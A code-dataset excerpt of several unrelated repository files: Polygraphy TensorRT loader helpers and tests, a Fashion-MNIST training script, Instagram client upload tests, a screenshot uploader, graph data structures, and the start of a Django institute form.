modify_network_str = Script.invoke(MODIFY_NETWORK, loader_name, outputs=outputs, exclude_outputs=args_util.get(args, "trt_exclude_outputs"))
if modify_network_str != Script.invoke(MODIFY_NETWORK, loader_name):
script.add_import(imports=[MODIFY_NETWORK], frm="polygraphy.backend.trt")
loader_name = script.add_loader(modify_network_str, "modify_network")
return loader_name
def add_trt_config_loader(script, args, data_loader_name):
profiles = []
for (min_shape, opt_shape, max_shape) in args_util.get(args, "profiles"):
profile_str = "Profile()"
for name in min_shape.keys():
profile_str += Script.format_str(".add({:}, min={:}, opt={:}, max={:})", name, min_shape[name], opt_shape[name], max_shape[name])
profiles.append(Inline(profile_str))
if profiles:
script.add_import(imports=["Profile"], frm="polygraphy.backend.trt")
sep = Inline("\n{:}".format(constants.TAB))
profiles = Script.format_str("[{:}{:}\n]", sep, Inline((",{:}".format(sep)).join(profiles)))
profile_name = script.add_loader(profiles, "profiles")
else:
profile_name = None
calibrator = None
if args_util.get(args, "int8"):
script.add_import(imports=["DataLoader"], frm="polygraphy.comparator")
script.add_import(imports=["Calibrator"], frm="polygraphy.backend.trt")
calibrator = Script.invoke("Calibrator", data_loader=Inline(data_loader_name) if data_loader_name else Inline("DataLoader()"),
cache=args_util.get(args, "calibration_cache"))
config_loader_str = Script.invoke_if_nondefault("CreateTrtConfig", max_workspace_size=args_util.get(args, "workspace"), tf32=args_util.get(args, "tf32"),
fp16=args_util.get(args, "fp16"), int8=args_util.get(args, "int8"), strict_types=args_util.get(args, "strict_types"),
profiles=profile_name, calibrator=Inline(calibrator) if calibrator else None)
if config_loader_str is not None:
script.add_import(imports=["CreateConfig as CreateTrtConfig"], frm="polygraphy.backend.trt")
config_loader_name = script.add_loader(config_loader_str, "create_trt_config")
else:
config_loader_name = None
return config_loader_name
def add_trt_serialized_engine_loader(script, args):
script.add_import(imports=["EngineFromBytes"], frm="polygraphy.backend.trt")
script.add_import(imports=["BytesFromPath"], frm="polygraphy.backend.common")
load_engine = script.add_loader(Script.invoke("BytesFromPath", args_util.get(args, "model_file")), "load_engine")
return script.add_loader(Script.invoke("EngineFromBytes", _wrap_if_plugins(script, args, load_engine)), "deserialize_engine")
def add_data_loader(script, args):
def omit_none_tuple(tup):
if all([elem is None for elem in tup]):
return None
return tup
int_range = omit_none_tuple(tup=(args_util.get(args, "int_min"), args_util.get(args, "int_max")))
float_range = omit_none_tuple(tup=(args_util.get(args, "float_min"), args_util.get(args, "float_max")))
input_metadata_str = Inline(repr(args_util.get(args, "inputs"))) if args_util.get(args, "inputs") else None
if input_metadata_str:
script.add_import(imports=["TensorMetadata"], frm="polygraphy.common")
data_loader = Script.invoke_if_nondefault("DataLoader", seed=args_util.get(args, "seed"), iterations=args_util.get(args, "iterations"),
input_metadata=input_metadata_str, int_range=int_range, float_range=float_range)
if data_loader is not None:
data_loader_name = Inline("data_loader")
script.add_import(imports=["DataLoader"], frm="polygraphy.comparator")
script.append_prefix(Script.format_str("\n# Inference Inputs Loader\n{:} = {:}\n", data_loader_name, Inline(data_loader)))
else:
data_loader_name = None
return data_loader_name
################################# PYTHON HELPERS #################################
def get_tf_model_loader(args):
script = Script()
loader_name = add_tf_loader(script, args)
exec(str(script), globals(), locals())
return locals()[loader_name]
def get_onnx_model_loader(args):
script = Script()
loader_name = add_onnx_loader(script, args)
exec(str(script), globals(), locals())
return locals()[loader_name]
def get_trt_network_loader(args):
script = Script()
loader_name = add_trt_network_loader(script, args)
exec(str(script), globals(), locals())
return locals()[loader_name]
def get_trt_config_loader(args, data_loader):
script = Script()
loader_name = add_trt_config_loader(script, args, data_loader_name="data_loader")
exec(str(script), globals(), locals())
return locals()[loader_name]
def get_trt_serialized_engine_loader(args):
script = Script()
loader_name = add_trt_serialized_engine_loader(script, args)
exec(str(script), globals(), locals())
return locals()[loader_name]
def get_data_loader(args):
script = Script()
data_loader_name = add_data_loader(script, args)
if data_loader_name is None: # All arguments are default
from polygraphy.comparator import DataLoader
return DataLoader()
exec(str(script), globals(), locals())
return locals()[data_loader_name]
```
#### File: backend/trt/test_loader.py
```python
from polygraphy.backend.trt import EngineFromBytes, EngineFromNetwork, CreateConfig, NetworkFromOnnxBytes, NetworkFromOnnxPath, ModifyNetwork, Calibrator, Profile, SaveEngine, LoadPlugins
from polygraphy.backend.trt import util as trt_util
from polygraphy.common import PolygraphyException, constants
from polygraphy.comparator import DataLoader
from tests.models.meta import ONNX_MODELS
from tests.common import version, check_file_non_empty
import tensorrt as trt
import numpy as np
import tempfile
import pytest
import os
@pytest.fixture(scope="session")
def identity_engine():
network_loader = NetworkFromOnnxBytes(ONNX_MODELS["identity"].loader)
engine_loader = EngineFromNetwork(network_loader, CreateConfig())
with engine_loader() as engine:
yield engine
@pytest.fixture(scope="session")
def identity_builder_network():
builder, network, parser = NetworkFromOnnxBytes(ONNX_MODELS["identity"].loader)()
with builder, network, parser:
yield builder, network
@pytest.fixture(scope="session")
def load_identity():
return NetworkFromOnnxBytes(ONNX_MODELS["identity"].loader)
@pytest.fixture(scope="session")
def load_identity_identity():
return NetworkFromOnnxBytes(ONNX_MODELS["identity_identity"].loader)
class TestLoadPlugins(object):
def test_can_load_libnvinfer_plugins(self):
def get_plugin_names():
return [pc.name for pc in trt.get_plugin_registry().plugin_creator_list]
loader = LoadPlugins(plugins=["libnvinfer_plugin.so"])
loader()
assert get_plugin_names()
class TestSerializedEngineLoader(object):
def test_serialized_engine_loader_from_lambda(self, identity_engine):
with tempfile.NamedTemporaryFile() as outpath:
with open(outpath.name, "wb") as f:
f.write(identity_engine.serialize())
loader = EngineFromBytes(lambda: open(outpath.name, "rb").read())
with loader() as engine:
assert isinstance(engine, trt.ICudaEngine)
def test_serialized_engine_loader_from_buffer(self, identity_engine):
loader = EngineFromBytes(identity_engine.serialize())
with loader() as engine:
assert isinstance(engine, trt.ICudaEngine)
class TestOnnxNetworkLoader(object):
def test_loader(self):
builder, network, parser = NetworkFromOnnxBytes(ONNX_MODELS["identity"].loader)()
with builder, network, parser:
assert not network.has_implicit_batch_dimension
assert not network.has_explicit_precision
def test_loader_explicit_precision(self):
builder, network, parser = NetworkFromOnnxBytes(ONNX_MODELS["identity"].loader, explicit_precision=True)()
with builder, network, parser:
assert not network.has_implicit_batch_dimension
assert network.has_explicit_precision
@pytest.mark.skipif(version(trt.__version__) < version("7.1.0.0"), reason="API was added in TRT 7.1")
class TestNetworkFromOnnxPath(object):
def test_loader(self):
builder, network, parser = NetworkFromOnnxPath(ONNX_MODELS["identity"].path)()
with builder, network, parser:
assert not network.has_implicit_batch_dimension
assert not network.has_explicit_precision
def test_loader_explicit_precision(self):
builder, network, parser = NetworkFromOnnxPath(ONNX_MODELS["identity"].path, explicit_precision=True)()
with builder, network, parser:
assert not network.has_implicit_batch_dimension
assert network.has_explicit_precision
class TestModifyNetwork(object):
def test_layerwise(self, load_identity_identity):
load_network = ModifyNetwork(load_identity_identity, outputs=constants.MARK_ALL)
builder, network, parser = load_network()
with builder, network, parser:
for layer in network:
for index in range(layer.num_outputs):
assert layer.get_output(index).is_network_output
def test_custom_outputs(self, load_identity_identity):
builder, network, parser = ModifyNetwork(load_identity_identity, outputs=["identity_out_0"])()
with builder, network, parser:
assert network.num_outputs == 1
assert network.get_output(0).name == "identity_out_0"
def test_exclude_outputs_with_layerwise(self, load_identity_identity):
builder, network, parser = ModifyNetwork(load_identity_identity, outputs=constants.MARK_ALL, exclude_outputs=["identity_out_2"])()
with builder, network, parser:
assert network.num_outputs == 1
assert network.get_output(0).name == "identity_out_0"
class TestProfile(object):
def test_can_add(self):
profile = Profile()
min, opt, max = (1, 1), (2, 2), (4, 4)
profile.add("input", min=min, opt=opt, max=max)
shape_tuple = profile["input"]
assert shape_tuple.min == min
assert shape_tuple.opt == opt
assert shape_tuple.max == max
class TestConfigLoader(object):
def test_defaults(self, identity_builder_network):
builder, network = identity_builder_network
loader = CreateConfig()
config = loader(builder, network)
assert config.max_workspace_size == 1 << 24
if version(trt.__version__) > version("7.1.0.0"):
assert not config.get_flag(trt.BuilderFlag.TF32)
assert not config.get_flag(trt.BuilderFlag.FP16)
assert not config.get_flag(trt.BuilderFlag.INT8)
assert config.num_optimization_profiles == 1
assert config.int8_calibrator is None
def test_workspace_size(self, identity_builder_network):
builder, network = identity_builder_network
loader = CreateConfig(max_workspace_size=0)
config = loader(builder, network)
assert config.max_workspace_size == 0
@pytest.mark.parametrize("flag", [True, False])
def test_strict_types(self, identity_builder_network, flag):
builder, network = identity_builder_network
loader = CreateConfig(strict_types=flag)
config = loader(builder, network)
assert config.get_flag(trt.BuilderFlag.STRICT_TYPES) == flag
@pytest.mark.parametrize("flag", [True, False])
def test_tf32(self, identity_builder_network, flag):
builder, network = identity_builder_network
loader = CreateConfig(tf32=flag)
config = loader(builder, network)
if version(trt.__version__) > version("7.1.0.0"):
assert config.get_flag(trt.BuilderFlag.TF32) == flag
@pytest.mark.parametrize("flag", [True, False])
def test_fp16(self, identity_builder_network, flag):
builder, network = identity_builder_network
loader = CreateConfig(fp16=flag)
config = loader(builder, network)
assert config.get_flag(trt.BuilderFlag.FP16) == flag
@pytest.mark.parametrize("flag", [True, False])
def test_int8(self, identity_builder_network, flag):
builder, network = identity_builder_network
loader = CreateConfig(int8=flag)
config = loader(builder, network)
assert config.get_flag(trt.BuilderFlag.INT8) == flag
def test_calibrator_metadata_set(self, identity_builder_network):
builder, network = identity_builder_network
calibrator = Calibrator(DataLoader())
loader = CreateConfig(int8=True, calibrator=calibrator)
config = loader(builder, network)
assert config.int8_calibrator
assert "x" in calibrator.data_loader.input_metadata
def test_multiple_profiles(self, identity_builder_network):
builder, network = identity_builder_network
profiles = [
Profile().add("x", (1, 2, 1, 1), (1, 2, 2, 2), (1, 2, 4, 4)),
Profile().add("x", (1, 2, 4, 4), (1, 2, 8, 8), (1, 2, 16, 16)),
]
loader = CreateConfig(profiles=profiles)
config = loader(builder, network)
assert config.num_optimization_profiles == 2
class TestEngineFromNetwork(object):
def test_can_build_with_parser_owning(self):
loader = EngineFromNetwork(NetworkFromOnnxBytes(ONNX_MODELS["identity"].loader))
with loader():
pass
def test_can_build_without_parser_non_owning(self, identity_builder_network):
builder, network = identity_builder_network
loader = EngineFromNetwork((builder, network))
with loader():
pass
def test_can_build_with_calibrator(self, identity_builder_network):
builder, network = identity_builder_network
calibrator = Calibrator(DataLoader())
create_config = CreateConfig(int8=True, calibrator=calibrator)
loader = EngineFromNetwork((builder, network), create_config)
with loader():
pass
# Calibrator buffers should be freed after the build
assert all([buf.allocated_nbytes == 0 for buf in calibrator.device_buffers.values()])
class TestSaveEngine(object):
def test_save_engine(self, load_identity):
with tempfile.NamedTemporaryFile() as outpath:
engine_loader = SaveEngine(EngineFromNetwork(load_identity), path=outpath.name)
with engine_loader() as engine:
check_file_non_empty(outpath.name)
```
#### File: tests/tools/test_inspect.py
```python
import copy
import glob
import os
import subprocess as sp
import sys
import tempfile
from textwrap import dedent
import pytest
from polygraphy.logger import G_LOGGER
from polygraphy.util import misc
from tests.common import check_file_non_empty, version
from tests.models.meta import ONNX_MODELS, TF_MODELS
from tests.tools.common import (run_polygraphy_inspect, run_polygraphy_run,
run_subtool)
#
# INSPECT MODEL
#
@pytest.fixture(scope="module", params=["none", "basic", "attrs", "full"])
def run_inspect_model(request):
yield lambda additional_opts: run_polygraphy_inspect(["model"] + ["--mode={:}".format(request.param)] + additional_opts)
# ONNX cases
ONNX_CASES = [
["identity", "none",
"""
[I] ==== ONNX Model ====
Name: test_identity | Opset: 8
---- 1 Graph Inputs ----
{x [dtype=float32, shape=(1, 1, 2, 2)]}
---- 1 Graph Outputs ----
{y [dtype=float32, shape=(1, 1, 2, 2)]}
---- 0 Initializers ----
(Use --mode to display)
---- 1 Nodes ----
(Use --mode to display)
"""
],
["identity", "basic",
"""
[I] ==== ONNX Model ====
Name: test_identity | Opset: 8
---- 1 Graph Inputs ----
{x [dtype=float32, shape=(1, 1, 2, 2)]}
---- 1 Graph Outputs ----
{y [dtype=float32, shape=(1, 1, 2, 2)]}
---- 0 Initializers ----
{}
---- 1 Nodes ----
Node 0 | [Op: Identity]
{x [dtype=float32, shape=(1, 1, 2, 2)]}
-> {y [dtype=float32, shape=(1, 1, 2, 2)]}
"""
],
["identity_with_initializer", "basic",
"""
[I] ==== ONNX Model ====
Name: onnx_graphsurgeon | Opset: 11
---- 0 Graph Inputs ----
{}
---- 1 Graph Outputs ----
{Y [dtype=float32, shape=(2, 2)]}
---- 1 Initializers ----
{X [dtype=float32, shape=(2, 2)]}
---- 1 Nodes ----
Node 0 | [Op: Identity]
{Initializer | X [dtype=float32, shape=(2, 2)]}
-> {Y [dtype=float32, shape=(2, 2)]}
"""
],
["identity_with_initializer", "full",
"""
[I] ==== ONNX Model ====
Name: onnx_graphsurgeon | Opset: 11
---- 0 Graph Inputs ----
{}
---- 1 Graph Outputs ----
{Y [dtype=float32, shape=(2, 2)]}
---- 1 Initializers ----
Initializer | X [dtype=float32, shape=[2, 2]] | Values:
[[1. 1.]
[1. 1.]]
---- 1 Nodes ----
Node 0 | [Op: Identity]
{Initializer | X [dtype=float32, shape=(2, 2)]}
-> {Y [dtype=float32, shape=(2, 2)]}
"""
],
["tensor_attr", "basic",
"""
[I] ==== ONNX Model ====
Name: onnx_graphsurgeon | Opset: 11
---- 0 Graph Inputs ----
{}
---- 1 Graph Outputs ----
{const_out [dtype=float32, shape=(14, 14)]}
---- 0 Initializers ----
{}
---- 1 Nodes ----
Node 0 | [Op: Constant]
{} -> {const_out [dtype=float32, shape=(14, 14)]}
"""
],
["tensor_attr", "attrs",
"""
[I] ==== ONNX Model ====
Name: onnx_graphsurgeon | Opset: 11
---- 0 Graph Inputs ----
{}
---- 1 Graph Outputs ----
{const_out [dtype=float32, shape=(14, 14)]}
---- 0 Initializers ----
{}
---- 1 Nodes ----
Node 0 | [Op: Constant]
{} -> {const_out [dtype=float32, shape=(14, 14)]}
---- Attributes ----
value = Tensor: [dtype=float32, shape=[14, 14]]
"""
],
["tensor_attr", "full",
"""
[I] ==== ONNX Model ====
Name: onnx_graphsurgeon | Opset: 11
---- 0 Graph Inputs ----
{}
---- 1 Graph Outputs ----
{const_out [dtype=float32, shape=(14, 14)]}
---- 0 Initializers ----
---- 1 Nodes ----
Node 0 | [Op: Constant]
{} -> {const_out [dtype=float32, shape=(14, 14)]}
---- Attributes ----
value = Tensor: [dtype=float32, shape=[14, 14]] | Values:
[[1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]]
"""
],
["scan", "full",
"""
[I] ==== ONNX Model ====
Name: graph | Opset: 10
---- 2 Graph Inputs ----
{initial [dtype=float32, shape=(2,)], x [dtype=float32, shape=(3, 2)]}
---- 2 Graph Outputs ----
{y [dtype=float32, shape=(2,)], z [dtype=float32, shape=(3, 2)]}
---- 0 Initializers ----
---- 1 Nodes ----
Node 0 | [Op: Scan]
{initial [dtype=float32, shape=(2,)], x [dtype=float32, shape=(3, 2)]}
-> {y [dtype=float32, shape=(2,)], z [dtype=float32, shape=(3, 2)]}
---- Attributes ----
body =
---- 2 Subgraph Inputs ----
{sum_in [dtype=float32, shape=(2,)], next [dtype=float32, shape=(2,)]}
---- 2 Subgraph Outputs ----
{sum_out [dtype=float32, shape=(2,)], scan_out [dtype=float32, shape=(2,)]}
---- 0 Initializers ----
---- 2 Nodes ----
Node 0 | [Op: Add]
{sum_in [dtype=float32, shape=(2,)], next [dtype=float32, shape=(2,)]}
-> {sum_out [dtype=float32, shape=(2,)]}
Node 1 | [Op: Identity]
{sum_out [dtype=float32, shape=(2,)]}
-> {scan_out [dtype=float32, shape=(2,)]}
num_scan_inputs = 1
"""
],
]
@pytest.mark.parametrize("case", ONNX_CASES, ids=lambda case: "{:}-{:}".format(case[0], case[1]))
def test_polygraphy_inspect_model_onnx(run_inspect_model, case):
model, mode, expected = case
status = run_polygraphy_inspect(["model", ONNX_MODELS[model].path, "--mode={:}".format(mode)], disable_verbose=True)
expected = dedent(expected).strip()
actual = status.stdout.decode()
print("Actual output:\n{:}".format(actual))
for acline, exline in zip(actual.splitlines(), expected.splitlines()):
acline = acline.rstrip()
exline = exline.rstrip()
print("Checking line : {:}".format(acline))
print("Expecting line: {:}".format(exline))
assert acline == exline
@pytest.mark.parametrize("model", ["identity", "scan", "tensor_attr"])
def test_polygraphy_inspect_model_trt_sanity(run_inspect_model, model):
import tensorrt as trt
if model == "tensor_attr" and version(trt.__version__) < version("7.2"):
pytest.skip("Models with constant outputs were not supported before 7.2")
if model == "scan" and version(trt.__version__) < version("7.0"):
pytest.skip("Scan was not supported until 7.0")
run_inspect_model([ONNX_MODELS[model].path, "--display-as=trt"])
def test_polygraphy_inspect_model_trt_engine_sanity(run_inspect_model):
with tempfile.NamedTemporaryFile() as outpath:
run_polygraphy_run([ONNX_MODELS["identity"].path, "--trt", "--save-engine", outpath.name])
run_inspect_model([outpath.name, "--model-type=engine"])
def test_polygraphy_inspect_model_tf_sanity(run_inspect_model):
run_inspect_model([TF_MODELS["identity"].path, "--model-type=frozen"])
#
# INSPECT RESULTS
#
@pytest.mark.parametrize("opts", [[], ["--show-values"]])
def test_polygraphy_inspect_results(opts):
with tempfile.NamedTemporaryFile() as outpath:
run_polygraphy_run([ONNX_MODELS["identity"].path, "--onnxrt", "--save-results", outpath.name])
run_polygraphy_inspect(["results", outpath.name] + opts)
```
#### File: pytorch_quantization/utils/amp_wrapper.py
```python
from absl import logging
try:
import apex.amp as amp
def half_function(fn):
return amp.half_function(fn)
def float_function(fn):
return amp.float_function(fn)
def promote_function(fn):
return amp.promote_function(fn)
except Exception:
logging.error("AMP is not avaialble.")
def half_function(fn):
return fn
def float_function(fn):
return fn
def promote_function(fn):
return fn
``` |
{
"source": "5hade5layer/IRIS-Dataset",
"score": 3
} |
#### File: IRIS-Dataset/fashion-mnist/train.py
```python
import tensorflow as tf
from tensorflow import keras
import matplotlib.pyplot as plt
from codecarbon import EmissionsTracker #Energy Usage
tracker = EmissionsTracker()
#@track_emissions(project_name="asd screening")
class myCallback(tf.keras.callbacks.Callback):
def on_epoch_end(self, epoch, logs={}):
if(logs.get('loss')<0.1):
print("\n accuracy")
self.model.stop_training = True
def main():
mnist = tf.keras.datasets.fashion_mnist
(training_images, training_labels), (test_images, test_labels) = mnist.load_data()
#Image in index 0
plt.imshow(training_images[0])
#print(training_labels[0])
#print(training_images[0])
#Image in index 42
plt.imshow(training_images[42])
#print(training_labels[42])
#print(training_images[42])
training_images = training_images/255.0
test_images = test_images/255.0
callbacks = myCallback()
model = tf.keras.Sequential([keras.layers.Flatten(),
tf.keras.layers.Dense(128, activation=tf.nn.relu),
tf.keras.layers.Dense(10, activation=tf.nn.softmax)])
model.compile(optimizer = 'adam', loss='sparse_categorical_crossentropy')
model.fit(training_images, training_labels, epochs = 130, callbacks = [callbacks])
test_accuracy = model.evaluate(test_images, test_labels)
train_accuracy = model.evaluate(training_images, training_labels)
print("Test Accuracy: ",test_accuracy)
print("Train Accuracy: ",train_accuracy)
if __name__ == "__main__":
tracker.start()
main()
emi: float=tracker.stop()
print(f"overall emmisions:{emi} kg")
emi= emi*89875517873681764
print(f"overall emmisions:{emi} joules")
``` |
{
"source": "5hirish/insta_scrapper",
"score": 3
} |
#### File: tests/web/upload.py
```python
import unittest
import time
try:
# python 2.x
from urllib2 import urlopen
except ImportError:
# python 3.x
from urllib.request import urlopen
import json
from ..common import WebApiTestBase, MockResponse, compat_mock
class UploadTests(WebApiTestBase):
"""Tests for ClientCompatPatch."""
@staticmethod
def init_all(api):
return [
{
'name': 'test_post_photo',
'test': UploadTests('test_post_photo', api),
},
{
'name': 'test_post_photo_mock',
'test': UploadTests('test_post_photo_mock', api),
},
]
@unittest.skip('Modifies data')
def test_post_photo(self):
sample_url = 'https://c1.staticflickr.com/5/4103/5059663679_85a7ec3f63_b.jpg'
res = urlopen(sample_url)
photo_data = res.read()
results = self.api.post_photo(photo_data, caption='Feathers #feathers')
self.assertEqual(results.get('status'), 'ok')
self.assertIsNotNone(results.get('media'))
@compat_mock.patch('web.Client._make_request')
def test_post_photo_mock(self, make_request):
ts_now = time.time()
make_request.return_value = {'status': 'ok', 'upload_id': '123456789'}
with compat_mock.patch(
'web.client.compat_urllib_request.OpenerDirector.open') as opener, \
compat_mock.patch('web.client.time.time') as time_mock, \
compat_mock.patch('web.client.random.choice') as rand_choice, \
compat_mock.patch('web.Client._read_response') as read_response, \
compat_mock.patch(
'web.client.compat_urllib_request.Request') as request:
opener.return_value = MockResponse()
time_mock.return_value = ts_now
rand_choice.return_value = 'x'
# add rhx_gis so that we can reuse the same response for init and uploading
read_response.return_value = json.dumps(
{'status': 'ok', 'upload_id': '123456789', 'rhx_gis': '22aea71b163e335a0ad4479549b530d7'},
separators=(',', ':')
)
self.api.post_photo('...'.encode('ascii'), caption='Test')
headers = {
'Accept-Language': 'en-US',
'Accept-Encoding': 'gzip, deflate',
'Origin': 'https://www.instagram.com',
'x-csrftoken': self.api.csrftoken,
'x-instagram-ajax': '1',
'Accept': '*/*',
'User-Agent': self.api.mobile_user_agent,
'Referer': 'https://www.instagram.com/create/details/',
'x-requested-with': 'XMLHttpRequest',
'Connection': 'close',
'Content-Type': 'application/x-www-form-urlencoded'}
body = '--{boundary}\r\n' \
'Content-Disposition: form-data; name="upload_id"\r\n\r\n' \
'{upload_id}\r\n' \
'--{boundary}\r\n' \
'Content-Disposition: form-data; name="media_type"\r\n\r\n1\r\n' \
'--{boundary}\r\n' \
'Content-Disposition: form-data; name="photo"; filename="photo.jpg"\r\n' \
'Content-Type: application/octet-stream\r\n' \
'Content-Transfer-Encoding: binary\r\n\r\n...\r\n' \
'--{boundary}--\r\n'.format(
boundary='----WebKitFormBoundary{}'.format('x' * 16),
upload_id=int(ts_now * 1000))
request.assert_called_with(
'https://www.instagram.com/create/upload/photo/',
body.encode('utf-8'), headers=headers)
``` |
{
"source": "5hirish/responder",
"score": 2
} |
#### File: responder/responder/formats.py
```python
import yaml
import json
async def format_form(r, encode=False):
if not encode:
return await r._starlette.form()
def format_yaml(r, encode=False):
if encode:
r.headers.update({"Content-Type": "application/x-yaml"})
return yaml.dump(r.media)
else:
return yaml.safe_load(r.content)
def format_json(r, encode=False):
if encode:
r.headers.update({"Content-Type": "application/json"})
return json.dumps(r.media)
else:
return json.loads(r.content)
def get_formats():
return {"json": format_json, "yaml": format_yaml, "form": format_form}
``` |
{
"source": "5HT2/fs-over-http",
"score": 3
} |
#### File: fs-over-http/scripts/screenshot.py
```python
from dotenv import load_dotenv
load_dotenv()
from datetime import datetime
import os
import pyperclip
import random
import requests
import string
import subprocess
import sys
import time
CDN_NAME = "frogg.ie"
BASE_URL = "https://{}/".format(CDN_NAME)
FOLDER_P = "https://i.l1v.in/public/i/"
S_FORMAT = "-region"
FILENAME = datetime.now().strftime("%Y-%m-%d-%H:%M:%S.png")
FILEPATH = os.environ.get('HOME') + "/pictures/screenshots/" + FILENAME
# Run bash command
def handle_bash_cmd(command):
process = subprocess.Popen(command, stdout=subprocess.PIPE)
output, error = process.communicate()
if error is not None:
handle_notification("Error Saving", error, "state-error")
exit(1)
# Send a notification
def handle_notification(title, description, icon):
bashCmd = "notify-send|" + title + "|" + description + "|--icon=" + icon + "|--app-name=" + CDN_NAME
handle_bash_cmd(bashCmd.split("|"))
# Generates a random 3 long filename
def get_file_name():
# Choose from "A-z0-9"
letters = string.ascii_letters + string.digits
return ''.join(random.choice(letters) for i in range(3))
# Returns the status code for the current https://frogg.ie/`file_name` url
def get_status_code():
return requests.get(BASE_URL + file_name).status_code
# If the second arg of the script is set, change S_FORMAT
if len(sys.argv) > 1:
S_FORMAT = sys.argv[1]
# Take screenshot with spectacle
bashCmd = "spectacle " + S_FORMAT + " -p -b -n -o=" + FILEPATH + " >/dev/null 2>&1"
handle_bash_cmd(bashCmd.split())
# Wait for spectacle to save the file
while os.path.isfile(FILEPATH) is False:
time.sleep(0.2)
# Get initial filename and status
file_name = get_file_name()
status_code = get_status_code()
# Loop until the filename isn't taken
while status_code == 200:
file_name = get_file_name()
status_code = get_status_code()
# Be sure it's a 404 Not Found
if status_code == 404:
# Upload file
files = {'file': open(FILEPATH, 'rb')}
response = requests.post(FOLDER_P + file_name, files=files, headers={'Auth': os.environ.get("FOH_SERVER_AUTH")})
if response.status_code != 200:
handle_notification("Error " + str(response.status_code), "Response: " + response.headers["X-Server-Message"], "state-error")
exit(1)
pyperclip.copy(BASE_URL + file_name)
handle_notification("Saved screenshot", file_name, "spectacle")
else:
handle_notification("Error " + str(response.status_code), "Response: " + response.headers["X-Server-Message"], "state-error")
``` |
{
"source": "5hubh4m/data_mining_fall_2016",
"score": 3
} |
#### File: Assignment 2/CSR/CSR.py
```python
class CSR:
def __init__(self):
self.n = 0
self.IA = []
self.JA = []
def __len__(self):
return self.n
def __str__(self):
return self.IA.__str__() + '\n' + self.JA.__str__()
def create(self, g):
self.n = len(g)
self.IA = [0]
for i in range(len(g)):
k = 0
for j in range(len(g)):
if g[i][j] != 0:
k += 1
self.JA.append(j)
self.IA.append(self.IA[i] + k)
def edges_from(self, v):
nodes = []
for i in range(self.IA[v], self.IA[v + 1]):
nodes.append(self.JA[i])
return nodes
```
#### File: Assignment 2/KSquareTree/KSquareTree.py
```python
from BitVector import BitVector
import math as m
class KSquareTree:
def __init__(self, k):
self.k = k
self.k2 = k * k
self.n = 0
self.h = 0
self.T = BitVector(size=0)
self.L = BitVector(size=0)
def __str__(self):
return self.T.__str__() + '\n' + self.L.__str__()
def __len__(self):
return self.n
def create(self, graph):
"""
Creates a k^2 tree graph representation from the given graph.
:param graph: An adjacency matrix representation of the graph.
It is assumed that len(graph) % k == 0.
:return: None
"""
assert len(graph) % self.k == 0
self.n = len(graph)
self.h = int(m.ceil(m.log(len(graph), self.k)))
temp = [BitVector(size=0) for _ in range(self.h)]
def build(n, l, p, q):
c = BitVector(size=0)
for i in range(self.k):
for j in range(self.k):
if l == self.h - 1:
c = c + BitVector(intVal=graph[p + i][q + j])
else:
c = c + build(n / self.k,
l + 1,
p + i * (n / self.k),
q + j * (n / self.k))
if c == BitVector(size=self.k2):
return BitVector(intVal=0)
temp[l] += c
return BitVector(intVal=1)
build(self.n, 0, 0, 0)
self.L = temp[self.h - 1]
for i in range(self.h - 1):
self.T += temp[i]
def edges_from(self, p):
"""
Returns the list of edges which are neighbours of p.
:param p: Vertex
:return: Vertices which are reachable from p
"""
nodes = []
def direct(n, p, q, x):
if x >= len(self.T):
if self.L[x - len(self.T)] == 1:
nodes.append(q)
else:
if x == -1 or self.T[x] == 1:
y = self.T.rank_of_bit_set_at_index(x) * self.k2 \
+ self.k * int(m.floor(p / (n / self.k)))
for j in range(self.k):
direct(n / self.k,
p % (n / self.k),
q + (n / self.k) * j,
y + j)
direct(self.n, p, 0, -1)
return nodes
def edges_to(self, q):
"""
Returns the list of vertices from which q is reachable.
:param q: Vertex
:return: Vertices from which q can be reached
"""
nodes = []
def reverse(n, q, p, x):
if x >= len(self.T):
if self.L[x - len(self.T)] == 1:
nodes.append(p)
else:
if x == -1 or self.T[x] == 1:
y = self.T.rank_of_bit_set_at_index(x) * self.k2 \
+ self.k * int(m.floor(q / (n / self.k)))
for j in range(self.k):
reverse(n / self.k,
q % (n / self.k),
p + (n / self.k) * j,
y + j * self.k)
reverse(self.n, q, 0, -1)
return nodes
``` |
{
"source": "5hubh4m/publications_portal",
"score": 3
} |
#### File: publications_portal/creator/forms.py
```python
import copy
from django import forms
from django.db import connection
class AddInstituteForm(forms.Form):
name = forms.CharField(
label='Institute Name',
help_text='Enter the name of the institute here.',
min_length=1
)
city = forms.CharField(
label='City',
help_text='Enter the city of the institute here.',
min_length=1
)
state = forms.CharField(
label='State',
help_text='Enter the state of the institute.',
min_length=1
)
country = forms.CharField(
label='Country',
help_text='Enter the country the institute is in.',
min_length=1
)
postal = forms.CharField(
label='Postal Code',
help_text='Enter the postal code of the institute here.',
min_length=1
)
url = forms.URLField(
label='Institute URL',
help_text='Enter a URL of the institute.',
min_length=1
)
def clean(self):
cleaned_data = super(AddInstituteForm, self).clean()
text_fields = {
'name': cleaned_data.get('name'),
'city': cleaned_data.get('city'),
'state': cleaned_data.get('state'),
'country': cleaned_data.get('country'),
}
for f in text_fields.keys():
if f in cleaned_data and any(char.isdigit() for char in text_fields[f]):
self.add_error('%s' % f, 'Field %s cannot contain numbers.' % f)
if 'postal' in cleaned_data and not all(char.isdigit() for char in cleaned_data.get('postal')):
self.add_error('postal', 'Postal code must be numeric.')
if 'name' in cleaned_data:
with connection.cursor() as cursor:
